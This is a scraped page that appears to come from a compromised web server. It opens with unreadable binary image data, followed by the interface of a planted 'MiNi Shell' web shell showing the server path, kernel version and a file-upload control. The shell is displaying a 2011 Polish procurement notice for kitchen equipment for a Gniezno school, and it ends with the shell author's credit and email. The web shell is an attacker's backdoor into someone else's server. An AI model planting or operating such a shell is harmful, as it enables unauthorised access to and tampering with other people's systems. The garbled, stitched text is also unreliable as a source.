JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111215/332315-N-2011.html

<p class="kh_header"><b>Gniezno: Dostawa wyposażenia Pracowni Gastronomiczno - Hotelarskiej Kształcenia Zawodowego przy Zespole Szkół Ponadgimnazjalnych nr 4 w Gnieźnie</b><br>
<b>Numer ogłoszenia: 332315 - 2011; data zamieszczenia: 15.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych Nr 4 , ul. Gdańska 106, 62-200 Gniezno, woj. wielkopolskie, tel. 61 426 65 23, faks 61 424 07 67.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsp4.gniezno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła ponadgimnazjalna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia Pracowni Gastronomiczno - Hotelarskiej Kształcenia Zawodowego przy Zespole Szkół Ponadgimnazjalnych nr 4 w Gnieźnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Dostawa wyposażenia warsztatów w pracowni gastronomicznej. 

1.		Profesjonalna kuchnia gazowa 4-palnikowa o wymiarach: szerokość do 660 mm, głębokość do 600 mm, wysokość do 290 mm ze stali nierdzewnej przystosowane do montażu z piekarnikiem z pozycji 2,	8 szt.;
2.		Piekarnik elektryczny o mocy 3 - 3,5 KW (230 V) i wymiarach: szerokość do 660 mm, głębokość do 600 mm, wysokość do 630 mm, przystosowany na minimum 4 pojemniki gastronomiczne GN 1/1. Piekarnik dostosowany do montażu pod kuchnią gazową z pozycji 1, 	8 szt.;
3.		Okap centralny skośny duży 2700x1600,	1 szt.;
4.		Oświetlenie halogenowe do okapu dużego - komplet - do okapu z pozycji 3,	1 szt.;
5.		Filtry do okapu dużego z  (łapacze tłuszczu) - do okapu z pozycji 3,	8 szt.;
6.		Okap centralny skośny mały 1600x1400, 	1 szt.;
7.		Oświetlenie halogenowe do okapu małego - komplet - do okapu z pozycji 6,	1 szt.;
8.		Filtry do okapu małego (łapacze tłuszczu) - do okapu z pozycji 6,	6 szt.;
9.		Stół roboczy ze zlewem 2-komorowym lewy ze stali nierdzewnej z drzwiami suwanymi 1400x600x850,	1 szt.;
10.		Stół roboczy ze stali nierdzewnej z drzwiami suwanymi 1400x600x850,	1 szt.;
11.		Stół roboczy ze stali nierdzewnej z drzwiami suwanymi 1500x600x850,	1 szt.;
12.		Stół roboczy ze stali nierdzewnej z szufladami 1100x600x850,	1 szt.;
13.		Stół przyścienny ze stali nierdzewnej z blokiem 3 szuflad 1000x700x85,	1 szt.;
14.		Zlew 2-komorowy zabudowany z wylewką kolanową,	3 szt.;
15.		Bateria z prysznicem,	4 szt.;
16.		Stół roboczy ze stali nierdzewnej z drzwiami suwanymi i blokiem 2 szuflad 1800x700x850,	1 szt.;
17.		Stół roboczy przyścienny ze stali nierdzewnej z półkami 1500x700x850,	1 szt.;
18.		Stół przyścienny z drzwiami suwanymi i blokiem3 szuflad 1400x700x850,	1 szt.;
19.		Szafa przelotowa drzwi skrzydłowe prawe i lewe ze stali nierdzewnej 600x630x850,	1 szt.;
20.		Stół roboczy przyścienny ze stali nierdzewnej z półkami i szafką lewoskrzydłową  1200x700x850,	1 szt.;
21.		Stół z basenem jednokomorowym głęboki ze stali nierdzewnej do mycia garnków 700x600x850,	1 szt.;
22.		Bemar 3 komorowy stacjonarny ze stali nierdzewnej 760x600x850,	1 szt.;
23.		Stół przyścienny z półką ze stali nierdzewnej 1200x700x850,	1 szt.;
24.		Umywalka zabudowana ze stali nierdzewnej (stanowisko do mycia rąk) 320x300150 wysokość 850,	1 szt.;
25.		Bateria umywalkowa jednootworowa łokciowa,	1 szt.;
26.		Szafa magazynowa drzwi skrzydłowe ze stali nierdzewnej 1800x1200,	1 szt.;
27.		Wózek kelnerski nierdzewny 800x500x850,	 2 szt.;
28.		Pojemnik na odpady ze stali nierdzewnej (średnica 530),	2 szt.;
29.		Naświetlacz bakteriobójczy do 30 sztuk jaj,	1 szt.;
30.		Kloc do mięsa,	1 szt.;
31.		Maszyna do mielenia mięsa wydajność 180 - 240 kg/h	, 1 szt. ;
32.		Płyta grillowa gładka 440V - moc do 6 KW, wymiary 660x530x220,	1 szt.;
33.		Mikser uniwersalny -wielofunkcyjne urządzenie do mieszania, ubijania i wyrabiania ciast - płynna regulacja obrotów, dzieża 4-5 l, zasilanie 230 V.,	1 szt.;
34.		Krajalnica uniwersalna do wędlin, moc 0,14 do 0,25 KW/230 V,	1 szt.;
35.		Waga elektroniczna, zakres ważenia do 10 kg,	2 szt.;
36.		Kuchenka mikrofalowa 1000 KW,	1 szt.;
37.		Frytkownica elektryczna 230 V, wydajność 5 kg/h,	1 szt.;
38.		Piec do pizzy 2-poziomowy, 2 x pizza śr. 35 cm, zasilanie 230 V,	1 szt.;
39.		Stół roboczy przyścienny z półką ze stali nierdzewnej 1100x70x850,	1 szt.;
40.		Zlew 2 komorowy ze stali nierdzewnej,	1 szt.;
41.		Bateria z prysznicem,	1 szt.;
42.		Pojemnik na odpady ze stali nierdzewnej (średnica 530),	1 szt.;

II. Dostawa wyposażenia sali ćwiczeń w pracowni gastronomicznej.

1.		Profesjonalna kuchnia gazowa 4-palnikowa o wymiarach: szerokość do 660 mm, głębokość do 600 mm, wysokość do 290 mm ze stali nierdzewnej przystosowane do montażu z piekarnikiem z pozycji 2, 	8 szt.;
2.		Piekarnik elektryczny o mocy 3 - 3,5 KW (230 V) i wymiarach: szerokość do 660 mm, głębokość do 600 mm, wysokość do 630 mm, przystosowany na minimum 4 pojemniki gastronomiczne GN 1/1.
Piekarnik dostosowany do montażu pod kuchnią gazową z pozycji 1,	8 szt.;
3.		Okap centralny skośny mały 1600x1400, 	2 szt.;
4.		Oświetlenie halogenowe do okapu małego - komplet - do okapu z pozycji 3,	2 szt.;
5.		Filtry do okapu małego (łapacze tłuszczu) - do okapu z pozycji 3 do okapu z pozycji 3,	12 szt.;
6.		Stół roboczy nierdzewny ze zlewem jednokomorowym lewy i drzwiami suwanymi 1400x600x850, 	4 szt.;
7.		Stół roboczy nierdzewny ze zlewem jednokomorowym prawy i drzwiami suwanymi 1400x600x850,	4 szt.;
8.		Stół przyścienny ze stali nierdzewnej z 3 drzwiami suwanymi 1600x700x850,	3 szt.;
9.		Stół przyścienny ze stali nierdzewnej z szufladami 450x700x850,	3 szt.;
10.		Stół przyścienny ze stali nierdzewnej z blokiem 3 szuflad 900x700x850,	1 szt.;
11.		Stół przyścienny zabudowany ze stali nierdzewnej z  półkami 1400x700x850,	1 szt.;
12.		Stół przyścienny ze stali nierdzewnej z 3 drzwiami skrzydłowymi 1600x700x850,	2 szt.;
13.		Stół przyścienny ze stali nierdzewnej z blokiem szuflad 450x700x850,	1 szt.;
14.		Bateria z prysznicem,	8 szt.;
15.		Umywalka zabudowana ze stali nierdzewnej (stanowisko do mycia rąk) 320x300150 wysokość 850,	1 szt.;
16.		Bateria umywalkowa jednootworowa łokciowa,	1 szt.;
17.		Pojemnik na odpady ze stali nierdzewnej (średnica 530),	2 szt.;
18.		Naświetlacz bakteriobójczy do 30 sztuk jaj,	1 szt.;
19.		Kloc do mięsa,	1 szt.;
20.		Maszyna do mielenia mięsa wydajność 180 - 240 kg/h, 	1 szt.;
21.		Mikser uniwersalny -wielofunkcyjne urządzenie do mieszania, ubijania i wyrabiania ciast - płynna regulacja obrotów, dzieża 4-5 l, zasilanie 230 V., 	1 szt.;
22.		Krajalnica uniwersalna do wędlin, moc 0,14 do 0,25 KW/230 V,	1 szt.;
23.		Waga elektroniczna, zakres ważenia do 10 kg,	2 szt.;
24.		Piec do pizzy 2-poziomowy, 2 x pizza śr. 35 cm, zasilanie 230 V,	1 szt.;
1.	Podane przez Zamawiającego parametry techniczne sprzętu gastronomicznego są parametrami minimalnymi. Wykonawca może zaproponować sprzęt o parametrach technicznych równoważnych lub wyższych, lecz nie gorszych od wskazanych przez Zamawiającego.
2.	Oferowany sprzęt musi być fabrycznie nowy (nieużywany).
3.	W cenie należy zawrzeć wszystkie koszty związane z realizacją zamówienia (min. koszt transportu i wniesienia sprzętu do pomieszczeń wskazanych przez Zamawiającego, koszt instalacji i montażu, przeszkolenia użytkowników w zakresie obsługi urządzeń oraz inne niewymienione koszty, niezbędne do pełnej realizacji zamówienia.
4.	Cena jednostkowa pojedynczego towaru nie może przekraczać 3 500 zł. brutto.
5.	Do każdego towaru misi być dołączona karta produktu.
6.	Wymiary podane w tabeli wynikają z projektu, który stanowi załącznik nr 6 i 7 do SIWZ.
7.	Odbiór towaru nastąpi na podstawie protokołu odbioru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zakłada możliwość udzielania zamówień uzupełniających, polegających 
na powtórzeniu tego samego rodzaju zamówień, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia dodatkowych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować, że w ciągu ostatnich trzech lat zrealizował, 
co najmniej jedną dostawę sprzętu o podobnym charakterze jak przedmiot zamówienia 
na kwotę, co najmniej 150 000,00 PLN, z podaniem ich wartości oraz daty i miejsca wykonania. Ponadto Wykonawca musi załączyć dokumenty potwierdzające, że te dostawy zostały wykonane należycie (np. referencje) - zał. nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie podpisanego oświadczenia 
o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie podpisanego oświadczenia 
o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie podpisanego oświadczenia 
o spełnianiu warunków udziału w postępowaniu (zał. nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, 
na podstawie, której dokonano wyboru wykonawcy, z uwzględnieniem podawanych warunków ich wprowadzenia:
1.	Zmiana ilości asortymentu po cenach zaproponowanych przez Wykonawcę.

Warunki dokonywania zmian: 
1.	inicjowanie zmian na wniosek wykonawcy lub zamawiającego,
2.	uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
3.	forma pisemna pod rygorem nieważności w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsp4.gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych nr 4 im. Jana Kilińskiego w Gnieźnie
ul. Gdańska 106, 62-200 Gniezno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2011 godzina 10:00, miejsce: Zespół Szkół Ponadgimnazjalnych nr 4 im. Jana Kilińskiego w Gnieźnie
ul. Gdańska 106, 62-200 Gniezno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com